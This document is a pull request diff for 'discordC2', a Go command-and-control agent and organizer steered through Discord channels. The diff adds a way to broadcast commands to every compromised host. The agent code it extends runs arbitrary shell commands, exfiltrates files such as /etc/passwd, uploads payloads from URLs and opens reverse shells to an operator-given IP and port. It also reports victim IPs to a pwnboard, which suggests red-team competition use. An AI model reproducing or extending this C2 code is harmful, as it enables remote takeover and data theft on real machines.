### PR TITLE
Fix role mention and add the ability to send commands to all hosts

### DIFF
--- a/cmd/agent/main.go
+++ b/cmd/agent/main.go
@@ -106,41 +106,14 @@ func messageCreater(dg *discordgo.Session, message *discordgo.MessageCreate) {
 		}
 	}
 
-	// Another special case
 	message_content := strings.Trim(re.ReplaceAllString(message.Content, ""), " ")
-	if len(message.MentionRoles) > 0 || strings.EqualFold(strings.SplitN(message_content, " ", 2)[0], "letredin") {
-		// PUT THIS IS A FUNCTION\
-		if message.ChannelID == channelID.ID {
-			fmt.Println(strings.SplitN(message_content, " ", 2)[1])
-			output := executeCommand(strings.SplitN(message_content, " ", 2)[1])
-			if output == "" {
-				dg.ChannelMessageSend(message.ChannelID, "Command didn't return anything")
-			} else {
-				batch := ""
-				counter := 0
-				largeOutputChunck := []string{}
-				for char := 0; char < len(output); char++ {
-					if counter < 2000 && char < len(output)-1 {
-						batch += string(output[char])
-						counter++
-					} else {
-						if char == len(output)-1 {
-							batch += string(output[char])
-						}
-						largeOutputChunck = append(largeOutputChunck, batch)
-						batch = string(output[char])
-						counter = 1
-					}
-				}
-
-				for _, chunck := range largeOutputChunck {
-					dg.ChannelMessageSend(message.ChannelID, "```"+chunck+"```")
-				}
-			}
-		}
+	parts := strings.SplitN(message_content, " ", 2)
+	first := parts[0]
+	rest := ""
+	if len(parts) > 1 {
+		rest = parts[1]
 	}
-
-	if !message.Author.Bot {
+	if !message.Author.Bot || (len(message.MentionRoles) > 0 || strings.EqualFold(first, "letredin")) {
 		if message.ChannelID == channelID.ID {
 			if message.Content == "ping" {
 				dg.ChannelMessageSend(message.ChannelID, "I'm alive bruv")
@@ -219,7 +192,7 @@ func messageCreater(dg *discordgo.Session, message *discordgo.MessageCreate) {
 					util.DownloadFile(commandBreakdown[2], commandBreakdown[1])
 				}
 			} else {
-				output := executeCommand(message.Content)
+				output := executeCommand(rest)
 				if output == "" {
 					dg.ChannelMessageSend(message.ChannelID, "Command didn't return anything")
 				} else {

--- a/cmd/agent/main.go
+++ b/cmd/agent/main.go
@@ -106,13 +106,17 @@ func messageCreater(dg *discordgo.Session, message *discordgo.MessageCreate) {
 		}
 	}
 
-	message_content := strings.Trim(re.ReplaceAllString(message.Content, ""), " ")
-	parts := strings.SplitN(message_content, " ", 2)
-	first := parts[0]
+	first := ""
 	rest := ""
-	if len(parts) > 1 {
-		rest = parts[1]
+	if strings.EqualFold(strings.SplitN(message.Content, " ", 2)[0], "letredin") {
+		message_content := strings.Trim(re.ReplaceAllString(message.Content, ""), " ")
+		parts := strings.SplitN(message_content, " ", 2)
+		first = parts[0]
+		if len(parts) > 1 {
+			rest = parts[1]
+		}
 	}
+
 	if !message.Author.Bot || (len(message.MentionRoles) > 0 || strings.EqualFold(first, "letredin")) {
 		if message.ChannelID == channelID.ID {
 			if message.Content == "ping" {

--- a/cmd/agent/main.go
+++ b/cmd/agent/main.go
@@ -111,8 +111,8 @@ func messageCreater(dg *discordgo.Session, message *discordgo.MessageCreate) {
 		message_content := strings.Trim(re.ReplaceAllString(message.Content, ""), " ")
 		// PUT THIS IS A FUNCTION\
 		if message.ChannelID == channelID.ID {
-			fmt.Println(message_content)
-			output := executeCommand(message_content)
+			fmt.Println(strings.SplitN(message_content, " ", 2)[1])
+			output := executeCommand(strings.SplitN(message_content, " ", 2)[1])
 			if output == "" {
 				dg.ChannelMessageSend(message.ChannelID, "Command didn't return anything")
 			} else {

--- a/cmd/agent/main.go
+++ b/cmd/agent/main.go
@@ -107,8 +107,8 @@ func messageCreater(dg *discordgo.Session, message *discordgo.MessageCreate) {
 	}
 
 	// Another special case
-	if len(message.MentionRoles) > 0 {
-		message_content := strings.Trim(re.ReplaceAllString(message.Content, ""), " ")
+	message_content := strings.Trim(re.ReplaceAllString(message.Content, ""), " ")
+	if len(message.MentionRoles) > 0 || strings.EqualFold(strings.SplitN(message_content, " ", 2)[0], "letredin") {
 		// PUT THIS IS A FUNCTION\
 		if message.ChannelID == channelID.ID {
 			fmt.Println(strings.SplitN(message_content, " ", 2)[1])

--- a/cmd/agent/main.go
+++ b/cmd/agent/main.go
@@ -117,8 +117,6 @@ func messageCreater(dg *discordgo.Session, message *discordgo.MessageCreate) {
 		}
 	}
 
-	println("Message received from: ", message.Author.Username, " | Message: ", message.Content)
-
 	if !message.Author.Bot || len(message.MentionRoles) > 0 || strings.EqualFold(first, "letredin") {
 		if message.ChannelID == channelID.ID {
 			if message.Content == "ping" {

--- a/cmd/agent/main.go
+++ b/cmd/agent/main.go
@@ -117,6 +117,8 @@ func messageCreater(dg *discordgo.Session, message *discordgo.MessageCreate) {
 		}
 	}
 
+	println("Message received from: ", message.Author.Username, " | Message: ", message.Content)
+
 	if !message.Author.Bot || len(message.MentionRoles) > 0 || strings.EqualFold(first, "letredin") {
 		if message.ChannelID == channelID.ID {
 			if message.Content == "ping" {
@@ -196,7 +198,13 @@ func messageCreater(dg *discordgo.Session, message *discordgo.MessageCreate) {
 					util.DownloadFile(commandBreakdown[2], commandBreakdown[1])
 				}
 			} else {
-				output := executeCommand(rest)
+				output := ""
+				if first == "" {
+					output = executeCommand(message.Content)
+				} else {
+					output = executeCommand(rest)
+				}
+
 				if output == "" {
 					dg.ChannelMessageSend(message.ChannelID, "Command didn't return anything")
 				} else {

--- a/cmd/agent/main.go
+++ b/cmd/agent/main.go
@@ -108,7 +108,7 @@ func messageCreater(dg *discordgo.Session, message *discordgo.MessageCreate) {
 
 	first := ""
 	rest := ""
-	if strings.EqualFold(strings.SplitN(message.Content, " ", 2)[0], "letredin") {
+	if strings.HasPrefix(strings.ToLower(message.Content), "letredin") {
 		message_content := strings.Trim(re.ReplaceAllString(message.Content, ""), " ")
 		parts := strings.SplitN(message_content, " ", 2)
 		first = parts[0]
@@ -117,7 +117,7 @@ func messageCreater(dg *discordgo.Session, message *discordgo.MessageCreate) {
 		}
 	}
 
-	if !message.Author.Bot || (len(message.MentionRoles) > 0 || strings.EqualFold(first, "letredin")) {
+	if !message.Author.Bot || len(message.MentionRoles) > 0 || strings.EqualFold(first, "letredin") {
 		if message.ChannelID == channelID.ID {
 			if message.Content == "ping" {
 				dg.ChannelMessageSend(message.ChannelID, "I'm alive bruv")

--- a/cmd/agent/main.go
+++ b/cmd/agent/main.go
@@ -106,6 +106,7 @@ func messageCreater(dg *discordgo.Session, message *discordgo.MessageCreate) {
 		}
 	}
 
+	// check for role mention or string letredin
 	first := ""
 	rest := ""
 	if strings.HasPrefix(strings.ToLower(message.Content), "letredin") || len(message.MentionRoles) > 0 {
@@ -117,19 +118,24 @@ func messageCreater(dg *discordgo.Session, message *discordgo.MessageCreate) {
 		}
 	}
 
+	// in case the command was sent through individual channel
+	if rest == "" {
+		rest = message.Content
+	}
+
 	if !message.Author.Bot || len(message.MentionRoles) > 0 || strings.EqualFold(first, "letredin") {
 		if message.ChannelID == channelID.ID {
-			if message.Content == "ping" {
+			if rest == "ping" {
 				dg.ChannelMessageSend(message.ChannelID, "I'm alive bruv")
-			} else if message.Content == "kill" {
+			} else if rest == "kill" {
 				dg.ChannelDelete(channelID.ID)
 				os.Exit(0)
-			} else if strings.HasPrefix(message.Content, "cd") {
-				commandBreakdown := strings.Fields(message.Content)
+			} else if strings.HasPrefix(rest, "cd") {
+				commandBreakdown := strings.Fields(rest)
 				os.Chdir(commandBreakdown[1])
 				dg.ChannelMessageSend(message.ChannelID, "```Directory changed to "+commandBreakdown[1]+"```")
-			} else if strings.HasPrefix(message.Content, "shell") {
-				splitCommand := strings.Fields(message.Content)
+			} else if strings.HasPrefix(rest, "shell") {
+				splitCommand := strings.Fields(rest)
 				if len(splitCommand) == 1 {
 					dg.ChannelMessageSend(message.ChannelID, "``` shell <type> <ip> <port> \n Example: shell bash 127.0.0.1 1337, shell sh 127.0.0.1 69696\n Shell type: bash and sh```")
 				} else if len(splitCommand) == 4 {
@@ -165,8 +171,8 @@ func messageCreater(dg *discordgo.Session, message *discordgo.MessageCreate) {
 				} else {
 					dg.ChannelMessageSend(message.ChannelID, "``` Incomplete command ```")
 				}
-			} else if strings.HasPrefix(message.Content, "download") {
-				commandBreakdown := strings.Fields(message.Content)
+			} else if strings.HasPrefix(rest, "download") {
+				commandBreakdown := strings.Fields(rest)
 				if len(commandBreakdown) == 1 {
 					dg.ChannelMessageSend(message.ChannelID, "Please specify file(s): download /etc/passwd")
 					return
@@ -180,8 +186,8 @@ func messageCreater(dg *discordgo.Session, message *discordgo.MessageCreate) {
 						dg.ChannelFileSend(message.ChannelID, file, bufio.NewReader(fileReader))
 					}
 				}
-			} else if strings.HasPrefix(message.Content, "upload") {
-				commandBreakdown := strings.Split(message.Content, " ")
+			} else if strings.HasPrefix(rest, "upload") {
+				commandBreakdown := strings.Split(rest, " ")
 				if len(commandBreakdown) == 1 {
 					dg.ChannelMessageSend(message.ChannelID, "Please specify the file: upload /etc/ssh/sshd_config(with attached file) or upload http://example.com/test.txt /tmp/test.txt")
 					return

--- a/cmd/agent/main.go
+++ b/cmd/agent/main.go
@@ -58,11 +58,6 @@ func main() {
 	}
 
 	channelID, _ = dg.GuildChannelCreate(util.ServerID, newAgent.IP, 0)
-	channelID, err := dg.GuildChannelCreate(util.ServerID, newAgent.IP, 0)
-	if err != nil {
-		fmt.Println("error creating channel:", err)
-		return
-	}
 
 	sendMessage := "``` Hostname: " + newAgent.HostName + "\n IP:" + newAgent.IP + "\n OS:" + newAgent.OS + "```"
 	message, _ := dg.ChannelMessageSend(channelID.ID, sendMessage)

--- a/cmd/agent/main.go
+++ b/cmd/agent/main.go
@@ -58,6 +58,11 @@ func main() {
 	}
 
 	channelID, _ = dg.GuildChannelCreate(util.ServerID, newAgent.IP, 0)
+	channelID, err := dg.GuildChannelCreate(util.ServerID, newAgent.IP, 0)
+	if err != nil {
+		fmt.Println("error creating channel:", err)
+		return
+	}
 
 	sendMessage := "``` Hostname: " + newAgent.HostName + "\n IP:" + newAgent.IP + "\n OS:" + newAgent.OS + "```"
 	message, _ := dg.ChannelMessageSend(channelID.ID, sendMessage)

--- a/cmd/agent/main.go
+++ b/cmd/agent/main.go
@@ -108,7 +108,7 @@ func messageCreater(dg *discordgo.Session, message *discordgo.MessageCreate) {
 
 	first := ""
 	rest := ""
-	if strings.HasPrefix(strings.ToLower(message.Content), "letredin") {
+	if strings.HasPrefix(strings.ToLower(message.Content), "letredin") || len(message.MentionRoles) > 0 {
 		message_content := strings.Trim(re.ReplaceAllString(message.Content, ""), " ")
 		parts := strings.SplitN(message_content, " ", 2)
 		first = parts[0]

--- a/cmd/organizer/main.go
+++ b/cmd/organizer/main.go
@@ -456,22 +456,15 @@ func guimessageCreater(dg *discordgo.Session, message *discordgo.MessageCreate) 
 	// whats really happening here is that the bot is supposed to see the commands from a channel under the "all" category
 	channel, _ := dg.Channel(message.ChannelID)
 	if channel.ParentID != "" {
-		// ignore general channels and only get messages from channels under the "all" category
-		parentChannel, _ := dg.Channel(channel.ParentID)
-		if parentChannel != nil && parentChannel.Name == "all" {
-
-			// we take the channel name that the user wants to send the command to
-			hostname := channel.Name
-
-			// go through all channels with same hostname and send the command
+		category, _ := dg.Channel(channel.ParentID)
+		if category != nil && category.Name == "all" {
 			channels, _ := dg.GuildChannels(util.ServerID)
-			for _, c := range channels {
-				// Check if the channel is under the same parent and has the same name as the hostname
-				// while making sure we ignore the one under the "all" category itself
-				if c.Type == discordgo.ChannelTypeGuildText {
-					if strings.EqualFold(c.Name, hostname) {
-						log.Info("Sending command to: " + c.Name)
-						dg.ChannelMessageSend(c.ID, message.Content)
+			for _, channelToCheck := range channels {
+				if channelToCheck.Type == discordgo.ChannelTypeGuildText && strings.EqualFold(channelToCheck.Name, channel.Name) {
+					cat, _ := dg.Channel(channelToCheck.ParentID)
+					if cat != nil && cat.Name != "all" {
+						log.Info("Sending command to: " + channelToCheck.Name + " in " + cat.Name)
+						dg.ChannelMessageSend(channelToCheck.ID, "letredin "+message.Content)
 					}
 				}
 			}

--- a/cmd/organizer/main.go
+++ b/cmd/organizer/main.go
@@ -254,6 +254,8 @@ func cleanChannels(dg *discordgo.Session, targetFile string) {
 			}
 		}
 	}
+
+	makeSendCommandToAllChannel(dg, hostnameList)
 	log.Info("End Clean")
 }
 

--- a/cmd/organizer/main.go
+++ b/cmd/organizer/main.go
@@ -455,16 +455,18 @@ func guimessageCreater(dg *discordgo.Session, message *discordgo.MessageCreate) 
 
 	// whats really happening here is that the bot is supposed to see the commands from a channel under the "all" category
 	channel, _ := dg.Channel(message.ChannelID)
-	if channel.ParentID != "" {
-		category, _ := dg.Channel(channel.ParentID)
-		if category != nil && category.Name == "all" {
-			channels, _ := dg.GuildChannels(util.ServerID)
-			for _, channelToCheck := range channels {
-				if channelToCheck.Type == discordgo.ChannelTypeGuildText && strings.EqualFold(channelToCheck.Name, channel.Name) {
-					cat, _ := dg.Channel(channelToCheck.ParentID)
-					if cat != nil && cat.Name != "all" {
-						log.Info("Sending command to: " + channelToCheck.Name + " in " + cat.Name)
-						dg.ChannelMessageSend(channelToCheck.ID, "letredin "+message.Content)
+	if channel != nil {
+		if channel.ParentID != "" {
+			category, _ := dg.Channel(channel.ParentID)
+			if category != nil && category.Name == "all" {
+				channels, _ := dg.GuildChannels(util.ServerID)
+				for _, channelToCheck := range channels {
+					if channelToCheck.Type == discordgo.ChannelTypeGuildText && strings.EqualFold(channelToCheck.Name, channel.Name) {
+						cat, _ := dg.Channel(channelToCheck.ParentID)
+						if cat != nil && cat.Name != "all" {
+							log.Info("Sending command to: " + channelToCheck.Name + " in " + cat.Name)
+							dg.ChannelMessageSend(channelToCheck.ID, "letredin "+message.Content)
+						}
 					}
 				}
 			}

--- a/cmd/organizer/main.go
+++ b/cmd/organizer/main.go
@@ -450,18 +450,26 @@ func guimessageCreater(dg *discordgo.Session, message *discordgo.MessageCreate) 
 		}
 	}
 
-	// what im doing i think is better
+	// what im doing i think is better version of above
 	// check if channel is under category "all"
+
+	// whats really happening here is that the bot is supposed to see the commands from a channel under the "all" category
 	channel, _ := dg.Channel(message.ChannelID)
 	if channel.ParentID != "" {
+		// ignore general channels and only get messages from channels under the "all" category
 		parentChannel, _ := dg.Channel(channel.ParentID)
 		if parentChannel != nil && parentChannel.Name == "all" {
+
+			// we take the channel name that the user wants to send the command to
+			hostname := channel.Name
+
 			// go through all channels with same hostname and send the command
 			channels, _ := dg.GuildChannels(util.ServerID)
 			for _, c := range channels {
 				// Check if the channel is under the same parent and has the same name as the hostname
-				if c.Type == discordgo.ChannelTypeGuildText && c.ParentID == parentChannel.ID {
-					if strings.EqualFold(c.Name, channel.Name) {
+				// while making sure we ignore the one under the "all" category itself
+				if c.Type == discordgo.ChannelTypeGuildText {
+					if strings.EqualFold(c.Name, hostname) {
 						log.Info("Sending command to: " + c.Name)
 						dg.ChannelMessageSend(c.ID, message.Content)
 					}

--- a/cmd/organizer/main.go
+++ b/cmd/organizer/main.go
@@ -258,6 +258,13 @@ func cleanChannels(dg *discordgo.Session, targetFile string) {
 }
 
 func makeSendCommandToAllChannel(dg *discordgo.Session, hostnameList []string) {
+	// check if category already exists for "all"
+	checkChannels, _ := dg.GuildChannels(util.ServerID)
+	for _, channel := range checkChannels {
+		if channel.Name == "all" && channel.Type == discordgo.ChannelTypeGuildCategory {
+			return
+		}
+	}
 	// get unique list of hostnames
 	uniqueMap := make(map[string]bool)
 	for _, h := range hostnameList {
@@ -454,7 +461,7 @@ func guimessageCreater(dg *discordgo.Session, message *discordgo.MessageCreate) 
 			for _, c := range channels {
 				// Check if the channel is under the same parent and has the same name as the hostname
 				if c.Type == discordgo.ChannelTypeGuildText && c.ParentID == parentChannel.ID {
-					if strings.ToLower(c.Name) == strings.ToLower(channel.Name) {
+					if strings.EqualFold(c.Name, channel.Name) {
 						log.Info("Sending command to: " + c.Name)
 						dg.ChannelMessageSend(c.ID, message.Content)
 					}

--- a/cmd/organizer/main.go
+++ b/cmd/organizer/main.go
@@ -329,7 +329,7 @@ func main() {
 // Request is done every 15 seconds
 // ip: Victim's IP
 func updatepwnBoard(ip string) {
-	url := "http://pwnboard.win/generic"
+	url := util.PwnboardURL
 
 	data := PwnBoard{
 		IPs:  ip,

--- a/install.sh
+++ b/install.sh
@@ -4,10 +4,5 @@
 # Installation script for discordC2.
 echo "Beginning DiscordGo C2 installation."
 
-printf "Please enter your server ID: "
-read server
-printf "Please enter your discord app token: "
-read token
-
 # Then run make
 make clean && make

--- a/pkg/agent/agent.go
+++ b/pkg/agent/agent.go
@@ -3,6 +3,7 @@ package agent
 import (
 	"net"
 	"os"
+	"strings"
 )
 
 // DEBUG is set to true, lots of print statement
@@ -67,11 +68,13 @@ func GetLocalIP() string {
 		os.Stderr.WriteString("Oops: " + err.Error() + "\n")
 		os.Exit(1)
 	}
-
 	for _, a := range addrs {
 		if ipnet, ok := a.(*net.IPNet); ok && !ipnet.IP.IsLoopback() {
 			if ipnet.IP.To4() != nil {
-				return ipnet.IP.String()
+				ipStr := ipnet.IP.String()
+				if strings.HasPrefix(ipStr, "172.16") {
+					return ipStr
+				}
 			}
 		}
 	}

--- a/pkg/util/variables.go
+++ b/pkg/util/variables.go
@@ -1,5 +1,6 @@
 // Package constants contains sensitive informations like the serverID and BotToken
 package util
 
-var ServerID = "XXXXXXXXXXXXXXXXX"
-var BotToken = "XXXXXXXXXXXXXXXXX"
+var ServerID = ""
+var BotToken = ""
+var PwnboardURL = ""


### PR DESCRIPTION
- Fixed role mention that sends the commands to all hosts. It was not working in first place as the command execution was including the role mention.
- Added an "all" category for all os types that works similarly to the role mention. Any commands sent in the channels (organized by os types) under "all" category will send the command to the same os type under each team category. To make this work, each message is prefixed with "letredin" to make the agents run the commands that were sent by the same bot.
- Removed the lines in install.sh that were asking for Bot Token and Server ID as it was not used and the variables.go can be edited.